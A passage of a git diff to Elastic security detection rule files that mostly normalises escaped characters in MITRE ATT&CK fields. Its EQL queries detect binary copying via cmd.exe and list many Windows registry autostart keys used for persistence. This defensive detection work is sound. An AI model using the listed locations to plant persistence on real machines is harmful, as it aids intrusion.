Control", diff --git a/packages/security_detection_engine/kibana/security_rule/530178da-92ea-43ce-94c2-8877a826783d_102.json b/packages/security_detection_engine/kibana/security_rule/530178da-92ea-43ce-94c2-8877a826783d_102.json index 9c5cb822114..f6c825f7afd 100644 --- a/packages/security_detection_engine/kibana/security_rule/530178da-92ea-43ce-94c2-8877a826783d_102.json +++ b/packages/security_detection_engine/kibana/security_rule/530178da-92ea-43ce-94c2-8877a826783d_102.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/530178da-92ea-43ce-94c2-8877a826783d_103.json b/packages/security_detection_engine/kibana/security_rule/530178da-92ea-43ce-94c2-8877a826783d_103.json index 403db9ab7b5..35a2e35e983 100644 --- a/packages/security_detection_engine/kibana/security_rule/530178da-92ea-43ce-94c2-8877a826783d_103.json +++ b/packages/security_detection_engine/kibana/security_rule/530178da-92ea-43ce-94c2-8877a826783d_103.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/530178da-92ea-43ce-94c2-8877a826783d_104.json b/packages/security_detection_engine/kibana/security_rule/530178da-92ea-43ce-94c2-8877a826783d_104.json index 81849bc1271..55c1d298e70 100644 --- a/packages/security_detection_engine/kibana/security_rule/530178da-92ea-43ce-94c2-8877a826783d_104.json +++ b/packages/security_detection_engine/kibana/security_rule/530178da-92ea-43ce-94c2-8877a826783d_104.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/530178da-92ea-43ce-94c2-8877a826783d_105.json b/packages/security_detection_engine/kibana/security_rule/530178da-92ea-43ce-94c2-8877a826783d_105.json index f8ba3f4aafe..c47fd054ec1 100644 --- a/packages/security_detection_engine/kibana/security_rule/530178da-92ea-43ce-94c2-8877a826783d_105.json +++ b/packages/security_detection_engine/kibana/security_rule/530178da-92ea-43ce-94c2-8877a826783d_105.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/53617418-17b4-4e9c-8a2c-8deb8086ca4b_1.json b/packages/security_detection_engine/kibana/security_rule/53617418-17b4-4e9c-8a2c-8deb8086ca4b_1.json index 43456c728fd..2be1ec1b424 100644 --- a/packages/security_detection_engine/kibana/security_rule/53617418-17b4-4e9c-8a2c-8deb8086ca4b_1.json +++ b/packages/security_detection_engine/kibana/security_rule/53617418-17b4-4e9c-8a2c-8deb8086ca4b_1.json @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/53617418-17b4-4e9c-8a2c-8deb8086ca4b_2.json b/packages/security_detection_engine/kibana/security_rule/53617418-17b4-4e9c-8a2c-8deb8086ca4b_2.json index 2aeb3b8e5d3..8fa92a8e8ee 100644 --- a/packages/security_detection_engine/kibana/security_rule/53617418-17b4-4e9c-8a2c-8deb8086ca4b_2.json +++ b/packages/security_detection_engine/kibana/security_rule/53617418-17b4-4e9c-8a2c-8deb8086ca4b_2.json @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/53617418-17b4-4e9c-8a2c-8deb8086ca4b_3.json b/packages/security_detection_engine/kibana/security_rule/53617418-17b4-4e9c-8a2c-8deb8086ca4b_3.json index a28a4046862..e8309bb3c3d 100644 --- a/packages/security_detection_engine/kibana/security_rule/53617418-17b4-4e9c-8a2c-8deb8086ca4b_3.json +++ b/packages/security_detection_engine/kibana/security_rule/53617418-17b4-4e9c-8a2c-8deb8086ca4b_3.json @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/53617418-17b4-4e9c-8a2c-8deb8086ca4b_4.json b/packages/security_detection_engine/kibana/security_rule/53617418-17b4-4e9c-8a2c-8deb8086ca4b_4.json index 4e1c1c1ba24..4d52ce2c93d 100644 --- a/packages/security_detection_engine/kibana/security_rule/53617418-17b4-4e9c-8a2c-8deb8086ca4b_4.json +++ b/packages/security_detection_engine/kibana/security_rule/53617418-17b4-4e9c-8a2c-8deb8086ca4b_4.json @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/53617418-17b4-4e9c-8a2c-8deb8086ca4b_5.json b/packages/security_detection_engine/kibana/security_rule/53617418-17b4-4e9c-8a2c-8deb8086ca4b_5.json index 67780998a1e..308dd840ef0 100644 --- a/packages/security_detection_engine/kibana/security_rule/53617418-17b4-4e9c-8a2c-8deb8086ca4b_5.json +++ b/packages/security_detection_engine/kibana/security_rule/53617418-17b4-4e9c-8a2c-8deb8086ca4b_5.json @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/536997f7-ae73-447d-a12d-bff1e8f5f0a0_102.json b/packages/security_detection_engine/kibana/security_rule/536997f7-ae73-447d-a12d-bff1e8f5f0a0_102.json index 4c02ec5505d..f5f7202e6df 100644 --- a/packages/security_detection_engine/kibana/security_rule/536997f7-ae73-447d-a12d-bff1e8f5f0a0_102.json +++ b/packages/security_detection_engine/kibana/security_rule/536997f7-ae73-447d-a12d-bff1e8f5f0a0_102.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/536997f7-ae73-447d-a12d-bff1e8f5f0a0_103.json b/packages/security_detection_engine/kibana/security_rule/536997f7-ae73-447d-a12d-bff1e8f5f0a0_103.json index 13096e29e8f..1522ffab974 100644 --- a/packages/security_detection_engine/kibana/security_rule/536997f7-ae73-447d-a12d-bff1e8f5f0a0_103.json +++ b/packages/security_detection_engine/kibana/security_rule/536997f7-ae73-447d-a12d-bff1e8f5f0a0_103.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/536997f7-ae73-447d-a12d-bff1e8f5f0a0_104.json b/packages/security_detection_engine/kibana/security_rule/536997f7-ae73-447d-a12d-bff1e8f5f0a0_104.json index 7c6a4d4ad7a..7ff996a4bbc 100644 --- a/packages/security_detection_engine/kibana/security_rule/536997f7-ae73-447d-a12d-bff1e8f5f0a0_104.json +++ b/packages/security_detection_engine/kibana/security_rule/536997f7-ae73-447d-a12d-bff1e8f5f0a0_104.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/536997f7-ae73-447d-a12d-bff1e8f5f0a0_205.json b/packages/security_detection_engine/kibana/security_rule/536997f7-ae73-447d-a12d-bff1e8f5f0a0_205.json index db4c5d12b3b..47ffb768d5c 100644 --- a/packages/security_detection_engine/kibana/security_rule/536997f7-ae73-447d-a12d-bff1e8f5f0a0_205.json +++ b/packages/security_detection_engine/kibana/security_rule/536997f7-ae73-447d-a12d-bff1e8f5f0a0_205.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/5370d4cd-2bb3-4d71-abf5-1e1d0ff5a2de_101.json b/packages/security_detection_engine/kibana/security_rule/5370d4cd-2bb3-4d71-abf5-1e1d0ff5a2de_101.json index 54864a11d7f..26234433276 100644 --- a/packages/security_detection_engine/kibana/security_rule/5370d4cd-2bb3-4d71-abf5-1e1d0ff5a2de_101.json +++ b/packages/security_detection_engine/kibana/security_rule/5370d4cd-2bb3-4d71-abf5-1e1d0ff5a2de_101.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/5370d4cd-2bb3-4d71-abf5-1e1d0ff5a2de_102.json b/packages/security_detection_engine/kibana/security_rule/5370d4cd-2bb3-4d71-abf5-1e1d0ff5a2de_102.json index a65df01f08c..dd7f930d843 100644 --- a/packages/security_detection_engine/kibana/security_rule/5370d4cd-2bb3-4d71-abf5-1e1d0ff5a2de_102.json +++ b/packages/security_detection_engine/kibana/security_rule/5370d4cd-2bb3-4d71-abf5-1e1d0ff5a2de_102.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/5397080f-34e5-449b-8e9c-4c8083d7ccc6_1.json b/packages/security_detection_engine/kibana/security_rule/5397080f-34e5-449b-8e9c-4c8083d7ccc6_1.json index e7fc8be012d..d2803d63d93 100644 --- a/packages/security_detection_engine/kibana/security_rule/5397080f-34e5-449b-8e9c-4c8083d7ccc6_1.json +++ b/packages/security_detection_engine/kibana/security_rule/5397080f-34e5-449b-8e9c-4c8083d7ccc6_1.json @@ -42,7 +42,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/53a26770-9cbd-40c5-8b57-61d01a325e14_104.json b/packages/security_detection_engine/kibana/security_rule/53a26770-9cbd-40c5-8b57-61d01a325e14_104.json index 665e2c2ce09..659668c273c 100644 --- a/packages/security_detection_engine/kibana/security_rule/53a26770-9cbd-40c5-8b57-61d01a325e14_104.json +++ b/packages/security_detection_engine/kibana/security_rule/53a26770-9cbd-40c5-8b57-61d01a325e14_104.json @@ -50,7 +50,7 @@ ], "risk_score": 21, "rule_id": "53a26770-9cbd-40c5-8b57-61d01a325e14", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/53a26770-9cbd-40c5-8b57-61d01a325e14_105.json b/packages/security_detection_engine/kibana/security_rule/53a26770-9cbd-40c5-8b57-61d01a325e14_105.json index b6c0ba99b64..7d955dec2bb 100644 --- a/packages/security_detection_engine/kibana/security_rule/53a26770-9cbd-40c5-8b57-61d01a325e14_105.json +++ b/packages/security_detection_engine/kibana/security_rule/53a26770-9cbd-40c5-8b57-61d01a325e14_105.json @@ -50,7 +50,7 @@ ], "risk_score": 21, "rule_id": "53a26770-9cbd-40c5-8b57-61d01a325e14", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/53a26770-9cbd-40c5-8b57-61d01a325e14_106.json b/packages/security_detection_engine/kibana/security_rule/53a26770-9cbd-40c5-8b57-61d01a325e14_106.json index 22fbff78c67..43225c989a4 100644 --- a/packages/security_detection_engine/kibana/security_rule/53a26770-9cbd-40c5-8b57-61d01a325e14_106.json +++ b/packages/security_detection_engine/kibana/security_rule/53a26770-9cbd-40c5-8b57-61d01a325e14_106.json @@ -50,7 +50,7 @@ ], "risk_score": 21, "rule_id": "53a26770-9cbd-40c5-8b57-61d01a325e14", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/53a26770-9cbd-40c5-8b57-61d01a325e14_107.json b/packages/security_detection_engine/kibana/security_rule/53a26770-9cbd-40c5-8b57-61d01a325e14_107.json index 7026a767708..9c1677cb782 100644 --- a/packages/security_detection_engine/kibana/security_rule/53a26770-9cbd-40c5-8b57-61d01a325e14_107.json +++ b/packages/security_detection_engine/kibana/security_rule/53a26770-9cbd-40c5-8b57-61d01a325e14_107.json @@ -50,7 +50,7 @@ ], "risk_score": 21, "rule_id": "53a26770-9cbd-40c5-8b57-61d01a325e14", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -79,7 +79,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/53a26770-9cbd-40c5-8b57-61d01a325e14_108.json b/packages/security_detection_engine/kibana/security_rule/53a26770-9cbd-40c5-8b57-61d01a325e14_108.json index b7a148b4a05..8d8b788786d 100644 --- a/packages/security_detection_engine/kibana/security_rule/53a26770-9cbd-40c5-8b57-61d01a325e14_108.json +++ b/packages/security_detection_engine/kibana/security_rule/53a26770-9cbd-40c5-8b57-61d01a325e14_108.json @@ -50,7 +50,7 @@ ], "risk_score": 21, "rule_id": "53a26770-9cbd-40c5-8b57-61d01a325e14", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -79,7 +79,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/53dedd83-1be7-430f-8026-363256395c8b_1.json b/packages/security_detection_engine/kibana/security_rule/53dedd83-1be7-430f-8026-363256395c8b_1.json index 103c27836d9..881d5bf49a9 100644 --- a/packages/security_detection_engine/kibana/security_rule/53dedd83-1be7-430f-8026-363256395c8b_1.json +++ b/packages/security_detection_engine/kibana/security_rule/53dedd83-1be7-430f-8026-363256395c8b_1.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Binary Content Copy via Cmd.exe", - "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"cmd.exe\" and (\n (process.args : \"type\" and process.args : (\"\u003e\", \"\u003e\u003e\")) or\n (process.args : \"copy\" and process.args : \"/b\"))\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"cmd.exe\" and (\n (process.args : \"type\" and process.args : (\">\", \">>\")) or\n (process.args : \"copy\" and process.args : \"/b\"))\n", "related_integrations": [ { "package": "endpoint", @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/53dedd83-1be7-430f-8026-363256395c8b_2.json b/packages/security_detection_engine/kibana/security_rule/53dedd83-1be7-430f-8026-363256395c8b_2.json index 77116bd7278..e521453d015 100644 --- a/packages/security_detection_engine/kibana/security_rule/53dedd83-1be7-430f-8026-363256395c8b_2.json +++ b/packages/security_detection_engine/kibana/security_rule/53dedd83-1be7-430f-8026-363256395c8b_2.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Binary Content Copy via Cmd.exe", - "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"cmd.exe\" and (\n (process.args : \"type\" and process.args : (\"\u003e\", \"\u003e\u003e\")) or\n (process.args : \"copy\" and process.args : \"/b\"))\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"cmd.exe\" and (\n (process.args : \"type\" and process.args : (\">\", \">>\")) or\n (process.args : \"copy\" and process.args : \"/b\"))\n", "related_integrations": [ { "package": "endpoint", @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -71,7 +71,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/54902e45-3467-49a4-8abc-529f2c8cfb80_102.json b/packages/security_detection_engine/kibana/security_rule/54902e45-3467-49a4-8abc-529f2c8cfb80_102.json index 09a1121f777..022c227dd30 100644 --- a/packages/security_detection_engine/kibana/security_rule/54902e45-3467-49a4-8abc-529f2c8cfb80_102.json +++ b/packages/security_detection_engine/kibana/security_rule/54902e45-3467-49a4-8abc-529f2c8cfb80_102.json @@ -11,9 +11,9 @@ "language": "eql", "license": "Elastic License v2", "name": "Uncommon Registry Persistence Change", - "query": "registry where host.os.type == \"windows\" and\n /* uncomment once stable length(registry.data.strings) \u003e 0 and */\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Terminal Server\\\\Install\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Terminal Server\\\\Install\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Runonce\\\\*\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\Load\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\Run\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\IconServiceLib\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\AppSetup\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Taskman\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Userinit\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\VmApplet\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\Shell\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logoff\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logon\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Shutdown\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Startup\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\Shell\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logoff\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logon\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Shutdown\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Startup\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\*\\\\ShellComponent\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnConnect\\\\MicrosoftActiveSync\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnDisconnect\\\\MicrosoftActiveSync\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Ctf\\\\LangBarAddin\\\\*\\\\FilePath\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Exec\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Command Processor\\\\Autorun\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Ctf\\\\LangBarAddin\\\\*\\\\FilePath\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Exec\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Command Processor\\\\Autorun\",\n \"HKEY_USERS\\\\*\\\\Control Panel\\\\Desktop\\\\scrnsave.exe\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\VerifierDlls\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\GpExtensions\\\\*\\\\DllName\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\SafeBoot\\\\AlternateShell\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Terminal Server\\\\Wds\\\\rdpwd\\\\StartupPrograms\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\BootExecute\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\SetupExecute\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\Execute\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\S0InitialCommand\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\ServiceControlManagerExtension\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\BootVerificationProgram\\\\ImagePath\",\n \"HKLM\\\\SYSTEM\\\\Setup\\\\CmdLine\",\n \"HKEY_USERS\\\\*\\\\Environment\\\\UserInitMprLogonScript\") and\n\n not registry.data.strings : (\"C:\\\\Windows\\\\system32\\\\userinit.exe\", \"cmd.exe\", \"C:\\\\Program Files (x86)\\\\*.exe\",\n \"C:\\\\Program Files\\\\*.exe\") and\n not (process.name : \"rundll32.exe\" and registry.path : \"*\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\") and\n not process.executable : (\"C:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\",\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\*\\\\MsMpEng.exe\",\n \"C:\\\\Program Files\\\\*.exe\",\n \"C:\\\\Program Files (x86)\\\\*.exe\")\n", + "query": "registry where host.os.type == \"windows\" and\n /* uncomment once stable length(registry.data.strings) > 0 and */\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Terminal Server\\\\Install\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Terminal Server\\\\Install\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Runonce\\\\*\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\Load\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\Run\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\IconServiceLib\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\AppSetup\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Taskman\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Userinit\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\VmApplet\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n 